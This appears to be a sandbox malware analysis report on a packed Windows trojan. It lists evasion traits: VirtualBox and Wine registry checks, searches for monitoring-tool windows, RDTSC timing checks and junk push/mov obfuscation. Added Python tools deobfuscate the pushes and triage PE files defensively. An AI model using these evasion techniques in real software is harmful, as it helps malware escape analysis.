Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00394A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: cwdxftgy ZLIB complexity 0.994878748673036
Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_003B3A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ACAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_003ACAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\YZMAG00M.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 44%
Source: file.exe | Virustotal: Detection: 51%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1794048 > 1048576
Source: file.exe | Static PE information: Raw size of cwdxftgy is bigger than: 0x100000 < 0x19c200

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.390000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cwdxftgy:EW;bjyaubdj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cwdxftgy:EW;bjyaubdj:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003B6390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b66aa should be: 0x1bdeac
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: cwdxftgy
Source: file.exe | Static PE information: section name: bjyaubdj
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BB837 push 3E389125h; mov dword ptr [esp], edx 0_2_007BB856
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007BB837 push edx; mov dword ptr [esp], 3F0414B3h 0_2_007BB8A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D0028 push ecx; mov dword ptr [esp], ebp 0_2_007D0097
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push 0903CC1Dh; mov dword ptr [esp], esi 0_2_007498DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], eax 0_2_007498ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ecx; mov dword ptr [esp], eax 0_2_00749934
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ebx; mov dword ptr [esp], eax 0_2_007499EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ebx; mov dword ptr [esp], 77A79757h 0_2_007499EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push eax; mov dword ptr [esp], edi 0_2_00749A20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ecx; mov dword ptr [esp], eax 0_2_00749A66
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push esi; mov dword ptr [esp], ebx 0_2_00749B86
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ebx; mov dword ptr [esp], 6F7D62CAh 0_2_00749B8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], ebp 0_2_00749BB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push 7CF33B72h; mov dword ptr [esp], ebp 0_2_00749C8D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], 5C788DAFh 0_2_00749CA9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], ecx 0_2_00749CFE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push 5F0F01CDh; mov dword ptr [esp], edi 0_2_00749D11
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push ecx; mov dword ptr [esp], 564F1A00h 0_2_00749D7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], ecx 0_2_00749D94
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push edx; mov dword ptr [esp], ebp 0_2_00749E38
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00749810 push 2277C68Ah; mov dword ptr [esp], eax 0_2_00749EB6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], esi0_2_00749EF4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push edx; mov dword ptr [esp], edi0_2_00749FAC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 5D196034h; mov dword ptr [esp], esi0_2_00749FE6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ebp; mov dword ptr [esp], edx0_2_00749FEF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 00F6107Dh; mov dword ptr [esp], edx0_2_0074A021
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 4A85BFBCh; mov dword ptr [esp], edi0_2_0074A0C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push 5C07BFB3h; mov dword ptr [esp], ecx0_2_0074A0E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push eax; mov dword ptr [esp], ecx0_2_0074A18F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], ebx0_2_0074A216
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749810 push ecx; mov dword ptr [esp], 3B13200Eh0_2_0074A21A
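Every push/mov entry above is the same two-instruction idiom: a push whose value is immediately overwritten by a store to [esp]. `push 3E389125h; mov dword ptr [esp], edx` is just `push edx`; `push edx; mov dword ptr [esp], 3F0414B3h` is `push 3F0414B3h`; `push ecx; mov dword ptr [esp], ebp` is `push ebp`. The dead immediates and the self-modifying stack writes break signature matching and confuse static disassembly without changing what the code does. As an added example, not Joe Sandbox's code and not derived from the sample, the Python below recognizes the three byte encodings involved (`68 imm32`, `50+r`, `89 /r` with SIB `24`, `C7 04 24 imm32`), rewrites each pair to the single push it amounts to, and NOP-pads in place so later offsets and relative jumps stay valid. The byte string it runs on is constructed from three of the entries above plus one ordinary push; the register table, the in-place NOP padding and the exclusion for esp are the example's own choices.

```python
import struct
from typing import List, Optional, Tuple

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
NOP = 0x90


def _mov_esp_reg(code: bytes, i: int) -> Optional[int]:
    """Register index r if code[i:] starts with `mov [esp], r32`
    (opcode 89, ModRM 00 r 100, SIB 24), else None."""
    if (i + 3 <= len(code) and code[i] == 0x89
            and (code[i + 1] & 0xC7) == 0x04 and code[i + 2] == 0x24):
        return (code[i + 1] >> 3) & 7
    return None


def _mov_esp_imm(code: bytes, i: int) -> Optional[int]:
    """imm32 if code[i:] starts with `mov dword ptr [esp], imm32` (C7 04 24 imm32), else None."""
    if i + 7 <= len(code) and code[i:i + 3] == b"\xc7\x04\x24":
        return struct.unpack_from("<I", code, i + 3)[0]
    return None


def _emit(out: bytearray, insn: bytes, span: int) -> None:
    """Write the replacement in place, NOP-padded so every offset after it is unchanged."""
    out += insn + bytes([NOP]) * (span - len(insn))


def normalize_pushes(code: bytes) -> Tuple[bytes, List[str]]:
    """Collapse `push X; mov [esp], Y` into `push Y`. Returns (patched bytes, log).

    `mov [esp], esp` is left alone: it stores the post-push esp, which a plain
    `push esp` (pre-push value) would not reproduce."""
    out, log, i, n = bytearray(), [], 0, len(code)
    while i < n:
        op = code[i]
        if op == 0x68 and i + 5 <= n:                       # push imm32
            r = _mov_esp_reg(code, i + 5)
            imm = _mov_esp_imm(code, i + 5)
            if r is not None and r != 4:                    # ...; mov [esp], reg  ->  push reg
                _emit(out, bytes([0x50 + r]), 8)
                log.append(f"{i:#06x}: push imm32; mov [esp], {REGS[r]} -> push {REGS[r]}")
                i += 8
                continue
            if imm is not None:                             # ...; mov [esp], imm2 ->  push imm2
                _emit(out, b"\x68" + struct.pack("<I", imm), 12)
                log.append(f"{i:#06x}: push imm32; mov [esp], {imm:#010x} -> push {imm:#010x}")
                i += 12
                continue
            out += code[i:i + 5]                            # ordinary push imm32: copy as a unit
            i += 5
            continue
        if 0x50 <= op <= 0x57:                              # push r32
            r = _mov_esp_reg(code, i + 1)
            imm = _mov_esp_imm(code, i + 1)
            if r is not None and r != 4:                    # push r1; mov [esp], r2 -> push r2
                _emit(out, bytes([0x50 + r]), 4)
                log.append(f"{i:#06x}: push {REGS[op - 0x50]}; mov [esp], {REGS[r]} -> push {REGS[r]}")
                i += 4
                continue
            if imm is not None:                             # push r1; mov [esp], imm -> push imm
                _emit(out, b"\x68" + struct.pack("<I", imm), 8)
                log.append(f"{i:#06x}: push {REGS[op - 0x50]}; mov [esp], {imm:#010x} -> push {imm:#010x}")
                i += 8
                continue
        out.append(op)                                      # anything else is copied byte by byte
        i += 1
    return bytes(out), log


# Constructed input: three idioms from the report followed by a genuine push.
SAMPLE = (
    b"\x68\x25\x91\x38\x3e\x89\x14\x24"    # push 3E389125h; mov dword ptr [esp], edx
    + b"\x52\xc7\x04\x24\xb3\x14\x04\x3f"  # push edx; mov dword ptr [esp], 3F0414B3h
    + b"\x51\x89\x2c\x24"                  # push ecx; mov dword ptr [esp], ebp
    + b"\x50\xc3"                          # push eax; ret  (left alone)
)

if __name__ == "__main__":
    patched, notes = normalize_pushes(SAMPLE)
    print(patched.hex(" "))
    print("\n".join(notes))
```

Run it over a function body dumped from the unpacked image (0.2.file.exe.390000.0.unpack in the report) rather than over the file on disk, since the on-disk sections are still packed. Because the pass works on raw bytes without a full disassembler, apply it only to ranges you know are code; a `68` or `5x` byte inside an immediate or a displacement would otherwise be misread as an instruction start.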
              Source: file.exeStatic PE information: section name: cwdxftgy entropy: 7.954401218621547
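The static PE findings in this group (entry point in .taggant, a header checksum that does not match, two unnamed sections plus the random names cwdxftgy and bjyaubdj, a section at entropy 7.95, and sections that are writable and executable at once) are checks a triage script can reproduce without running the sample. The Python below is an added example, not Joe Sandbox's code and not taken from the sample: with the standard library only it parses a PE32 section table, computes per-section entropy, locates the section holding the entry point, flags writable-and-executable sections, and recomputes the header checksum with the ones-complement 16-bit word sum that imagehlp's CheckSumMappedFile uses. Since the sample itself cannot be embedded here, the block builds a small synthetic PE32 (build_pe, a constructed fixture) whose layout mirrors the report: .text, .rsrc, a packed RWX section named cwdxftgy and the entry point in .taggant. The section list, the 7.0-bit entropy threshold and the set of "common" section names are the example's assumptions.

```python
import collections
import math
import struct

# Section names a mainstream linker emits; anything else deserves a look.
COMMON_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                   ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".textbss"}
SCN_CODE, SCN_IDATA = 0x00000020, 0x00000040
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000

Section = collections.namedtuple("Section", "name vsize va raw_size raw_ptr chars")


def entropy(blob: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not blob:
        return 0.0
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(blob).values())


def pe_checksum(data: bytes, checksum_off: int) -> int:
    """PE header checksum: ones-complement sum of 16-bit words, skipping the
    CheckSum field itself, plus the file length."""
    total, n = 0, len(data)
    for i in range(0, n - 1, 2):
        if checksum_off <= i < checksum_off + 4:
            continue
        total += data[i] | (data[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if n & 1:
        total += data[-1]
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + n


def _headers(data: bytes):
    """Return (offset of optional header, parsed section table)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    secs = []
    for k in range(nsec):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * k)
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = fields
        secs.append(Section(name.rstrip(b"\0").decode("latin-1"), vsize, va, raw_size, raw_ptr, chars))
    return opt, secs


def triage(data: bytes) -> dict:
    """The static checks the report lists: entry-point section, odd section names,
    packed (high-entropy) sections, RWX sections and header checksum."""
    opt, secs = _headers(data)
    entry = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint
    stored = struct.unpack_from("<I", data, opt + 64)[0]     # CheckSum
    ep = next((s for s in secs if s.va <= entry < s.va + max(s.vsize, s.raw_size)), None)
    return {
        "entry_section": ep.name if ep else None,
        "entry_in_common_section": ep is not None and ep.name in COMMON_SECTIONS,
        "odd_section_names": [s.name for s in secs if s.name not in COMMON_SECTIONS],
        "high_entropy_sections": [s.name for s in secs
                                  if entropy(data[s.raw_ptr:s.raw_ptr + s.raw_size]) > 7.0],
        "writable_executable": [s.name for s in secs if s.chars & SCN_EXEC and s.chars & SCN_WRITE],
        "checksum_stored": stored,
        "checksum_matches": stored == pe_checksum(data, opt + 64),
    }


def build_pe(sections, entry_section: str) -> bytes:
    """Constructed fixture: a minimal PE32 with the given (name, body, characteristics)
    sections, a valid checksum, and the entry point at the start of entry_section."""
    e_lfanew, opt_size, falign, salign = 0x40, 224, 0x200, 0x1000
    nsec = len(sections)
    hdr_len = -(-(e_lfanew + 24 + opt_size + 40 * nsec) // falign) * falign
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase
    struct.pack_into("<II", opt, 32, salign, falign)         # Section/FileAlignment
    hdrs, bodies, va, raw_ptr = b"", b"", salign, hdr_len
    for name, body, chars in sections:
        raw_size = -(-len(body) // falign) * falign
        if name == entry_section:
            struct.pack_into("<I", opt, 16, va)              # AddressOfEntryPoint
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(body), va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += body.ljust(raw_size, b"\0")
        va += max(salign, -(-len(body) // salign) * salign)
        raw_ptr += raw_size
    image = bytearray((dos + coff + bytes(opt) + hdrs).ljust(hdr_len, b"\0") + bodies)
    cs_off = e_lfanew + 24 + 64
    struct.pack_into("<I", image, cs_off, pe_checksum(image, cs_off))
    return bytes(image)


# Constructed sample mirroring the report: ordinary .text, a data section, a packed
# RWX section with a random name, and the entry point placed in .taggant.
PACKED = bytes(range(256)) * 16                              # uniform bytes: entropy 8.0
SAMPLE = build_pe([
    (".text", b"\x55\x8b\xec\x33\xc0\x5d\xc3", SCN_CODE | SCN_EXEC | SCN_READ),
    (".rsrc", b"RSRC" + b"\0" * 60, SCN_IDATA | SCN_READ),
    ("cwdxftgy", PACKED, SCN_EXEC | SCN_READ | SCN_WRITE),
    (".taggant", b"\xe9\x00\x00\x00\x00", SCN_EXEC | SCN_READ | SCN_WRITE),
], entry_section=".taggant")

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key:24} {value}")
```

On a real file, pass `open(path, "rb").read()` to `triage()`. A stored checksum of zero only means the linker did not set one, and user-mode images load whether or not the field is correct; a non-zero value that does not match, as in this report (0x1b66aa stored, 0x1bdeac expected), means the file was rewritten after linking, which is exactly what a packer or protector does when it replaces sections. The `.idata` and unnamed sections in the report would show up under `odd_section_names` only for the unnamed ones, since `.idata` is a normal import section name.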

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_003B6390

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-26365
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DFB84 second address: 5DFB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754569 second address: 754579 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F3CC87F76h 0x00000008 jnl 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754579 second address: 75457F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75457F second address: 754583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754583 second address: 754592 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F4F3C50B5D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7546EB second address: 7546FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4F3CC87F7Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7546FD second address: 754701 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75484D second address: 754851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754851 second address: 754857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7549DA second address: 754A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F88h 0x0000000b jmp 00007F4F3CC87F7Ch 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 je 00007F4F3CC87F76h 0x0000001a pushad 0x0000001b popad 0x0000001c jns 00007F4F3CC87F76h 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754B59 second address: 754B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754B5E second address: 754B77 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F3CC87F7Ch 0x00000008 je 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 754B77 second address: 754B81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757C27 second address: 757C93 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F4F3CC87F78h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov si, dx 0x00000024 mov ecx, dword ptr [ebp+122D3A21h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F4F3CC87F78h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 jp 00007F4F3CC87F7Ch 0x0000004c push 72F2075Bh 0x00000051 push eax 0x00000052 push edx 0x00000053 jg 00007F4F3CC87F7Ch 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757C93 second address: 757D29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F4F3C50B5D6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 72F207DBh 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F4F3C50B5D8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d movzx ecx, cx 0x00000030 push 00000003h 0x00000032 mov edx, dword ptr [ebp+122D38B5h] 0x00000038 push 00000000h 0x0000003a mov cx, 255Eh 0x0000003e push 00000003h 0x00000040 mov cx, 2CA4h 0x00000044 sub edi, dword ptr [ebp+122D268Fh] 0x0000004a call 00007F4F3C50B5D9h 0x0000004f jo 00007F4F3C50B5DCh 0x00000055 pushad 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pushad 0x00000059 popad 0x0000005a popad 0x0000005b push eax 0x0000005c jng 00007F4F3C50B5EEh 0x00000062 mov eax, dword ptr [esp+04h] 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F4F3C50B5DEh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757D29 second address: 757DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F4F3CC87F8Ch 0x0000000f jmp 00007F4F3CC87F86h 0x00000014 popad 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 jnc 00007F4F3CC87F76h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 jmp 00007F4F3CC87F82h 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c jmp 00007F4F3CC87F7Eh 0x00000031 pop eax 0x00000032 mov di, bx 0x00000035 lea ebx, dword ptr [ebp+1244B98Ch] 0x0000003b push 00000000h 0x0000003d push ebp 0x0000003e call 00007F4F3CC87F78h 0x00000043 pop ebp 0x00000044 mov dword ptr [esp+04h], ebp 0x00000048 add dword ptr [esp+04h], 0000001Dh 0x00000050 inc ebp 0x00000051 push ebp 0x00000052 ret 0x00000053 pop ebp 0x00000054 ret 0x00000055 mov si, F56Ah 0x00000059 push eax 0x0000005a pushad 0x0000005b jmp 00007F4F3CC87F7Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 push edi 0x00000063 pop edi 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757E0E second address: 757E7E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D300Eh], esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F4F3C50B5D8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D2963h], ecx 0x00000037 mov edi, dword ptr [ebp+122D3899h] 0x0000003d call 00007F4F3C50B5D9h 0x00000042 jo 00007F4F3C50B5E5h 0x00000048 jmp 00007F4F3C50B5DFh 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jnp 00007F4F3C50B5D6h 0x00000057 jnc 00007F4F3C50B5D6h 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757E7E second address: 757E9C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4F3CC87F7Ch 0x00000008 je 00007F4F3CC87F76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jg 00007F4F3CC87F78h 0x0000001c rdtsc
